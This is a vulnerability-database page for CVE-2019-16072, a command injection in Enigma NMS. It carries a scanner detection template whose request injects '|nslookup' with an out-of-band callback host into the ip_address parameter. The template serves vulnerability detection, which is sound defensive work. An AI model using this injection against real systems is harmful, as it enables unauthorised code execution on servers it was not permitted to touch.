Vulners
Lucene search
Enigma NMS < 65.0.0 - Authenticated OS Command Injection
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | Enigma NMS 65.0.0 - OS Command Injection Exploit | 9 Sep 201900:00 | – | zdt |
 | CVE-2019-16072 | 19 Oct 202523:53 | – | circl |
 | Netsas Enigma Network Management Solution Remote Code Execution (CVE-2019-16072) | 10 Sep 202000:00 | – | checkpoint_advisories |
 | CVE-2019-16072 | 19 Mar 202023:06 | – | cve |
 | CVE-2019-16072 | 19 Mar 202023:06 | – | cvelist |
 | Enigma NMS 65.0.0 - OS Command Injection | 9 Sep 201900:00 | – | exploitdb |
 | Enigma NMS 65.0.0 - OS Command Injection | 9 Sep 201900:00 | – | exploitpack |
 | CVE-2019-16072 | 20 Mar 202000:17 | – | nvd |
 | Enigma NMS 65.0.0 OS Command Injection | 9 Sep 201900:00 | – | packetstorm |
 | Command injection | 20 Mar 202000:17 | – | prion |
10
id: CVE-2019-16072
info:
name: Enigma NMS < 65.0.0 - Authenticated OS Command Injection
author: 0x_Akoko
severity: critical
description: |
An OS command injection vulnerability in the discover_and_manage CGI script in NETSAS Enigma NMS 65.0.0 and prior allows an authenticated attacker to execute arbitrary code because of improper neutralization of shell metacharacters in the ip_address variable within an snmp_browser action.
impact: |
Attackers can execute arbitrary code on the server, potentially leading to full system compromise.
remediation: |
Update to the latest version of NETSAS Enigma NMS or apply security patches that fix input sanitization.
reference:
- https://www.exploit-db.com/exploits/47202
- https://nvd.nist.gov/vuln/detail/CVE-2019-16072
- https://web.archive.org/web/20201220124431/https://www.mogozobo.com/?p=3647
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-16072
cwe-id: CWE-78
epss-score: 0.25279
epss-percentile: 0.97667
cpe: cpe:2.3:a:netsas:enigma_network_management_solution:*:*:*:*:*:*:*:*
metadata:
verified: false
max-request: 2
vendor: netsas
product: enigma_network_management_solution
tags: cve,cve2019,authenticated,enigma,nms,oast,oob,vkev
flow: http(1) && http(2)
variables:
username: "{{username}}"
password: "{{password}}"
http:
- raw:
- |
GET /cgi-bin/protected/main.cgi HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: response
words:
- "ENIGMA NMS"
internal: true
- raw:
- |
GET /cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser&hst_id=none&snmpv3_profile_id=&ip_address=|nslookup+{{interactsh-url}}&snmp_ro_string=public&mib_oid=system&mib_oid_manual=.1.3.6.1.2.1.1&snmp_version=1 HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64(username + ':' + password)}}
matchers:
- type: dsl
dsl:
- 'contains(tolower(body), "snmp") || status_code == 200'
- 'contains(interactsh_protocol, "dns")'
condition: and
# digest: 4b0a00483046022100810cb3aa5c246b509522103151744b405fab7bda808c37c9e8a024dc44031f74022100af1434c566412a2fea497be92ad6444fc77e08a870db766a94254a267426b2f1:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
7.7High risk
Vulners AI Score7.7
CVSS 3.19.8
CVSS 210
EPSS0.25279